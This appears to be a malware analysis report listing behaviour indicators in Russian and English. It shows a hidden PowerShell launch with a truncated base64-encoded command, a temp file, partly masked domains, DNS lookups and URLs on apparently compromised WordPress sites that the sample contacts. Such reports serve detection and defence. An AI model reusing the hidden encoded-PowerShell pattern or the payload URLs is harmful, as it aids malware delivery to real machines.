Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAHgAZgB5AGcAaQBmAGIAcgBjAGQAPQAnAFMAcQBwAGoAdAB1AHAAZAB1AHAAeAAnADsAJABVAHkAcABkAGwAZQBpAHMAaAB1AGcAIAA9ACAAJwAxADYAMgAnADsAJABCAGcAYgB3AHcAbABjAGIAagB2AGcAaQA9ACcATABjAHcAbQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1488
- %TEMP%\774513.cvr
- 'be######on.futurismdemo.com':80
- 'od####ccounting.com':80
- 'mo####epetes.com':80
- 'mo####epetes.com':443
- http://od####ccounting.com/wp-includes/rest-api/search/R/
- http://mo####epetes.com/disneyworldclassroom/sy52j7/
- 'mo####epetes.com':443
- DNS ASK be######on.futurismdemo.com
- DNS ASK gn#.###penizedev.com
- DNS ASK od####ccounting.com
- DNS ASK mo####epetes.com
- DNS ASK ba###tories.com